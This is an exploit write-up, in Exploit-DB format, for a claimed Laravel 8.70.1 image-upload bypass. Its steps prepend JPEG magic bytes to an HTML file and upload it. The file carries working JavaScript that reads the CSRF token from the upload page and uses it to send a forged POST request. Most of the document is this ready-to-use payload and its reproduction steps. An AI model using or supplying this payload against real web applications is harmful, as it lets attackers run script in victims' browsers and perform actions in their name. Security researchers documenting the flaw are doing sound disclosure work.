# Exploit Title: PHP Laravel 8.70.1 - Cross Site Scripting (XSS) to Cross Site Request Forgery (CSRF)# Date: 14/11/2021# Exploit Author: Hosein Vita# Vendor Homepage: https://laravel.com/# Software Link: https://laravel.com/docs/4.2# Version: Laravel Framework 8.70.1# Tested on: Windows/Linux# Description: We can bypass laravel image file upload functionality to upload arbitary files on the web server# which let us run arbitary javascript and bypass the csrf token , For more information read this one https://hosein-vita.medium.com/laravel-8-x-image-upload-bypass-zero-day-852bd806019b# Steps to reproduce:1- Use HxD tool and add FF D8 FF E0 at the very begining of your file2- Use code below to bypass csrf token
ÿØÿà<html><head><title>Laravel Csrf Bypass</title></head><body><script>
function submitFormWithTokenJS(token){
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);// Send the proper header information along with the request
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");// This isfor debugging and can be removed
xhr.onreadystatechange = function(){if(xhr.readyState === XMLHttpRequest.DONE && xhr.status ===200){
console.log(xhr.responseText);}}//
xhr.send("_token="+ token +"&desiredParameter=desiredValue");}
function getTokenJS(){
var xhr = new XMLHttpRequest();// This tels it to return it as a HTML document
xhr.responseType ="document";// true on the end of here makes the call asynchronous
//Edit the path as you want
xhr.open("GET","/image-upload", true);
xhr.onload = function (e){if(xhr.readyState === XMLHttpRequest.DONE && xhr.status ===200){// Get the document from the response
page = xhr.response
// Get the input element
input= page.getElementsByTagName("input")[0];// Show the token
alert("The token is: "+input.value);// Use the token to submit the form
submitFormWithTokenJS(input.value);}};// Make the request
xhr.send(null);}
getTokenJS();
var POST_URL="/"
getTokenJS();</script></html>3- Save it as Html fileand upload it.
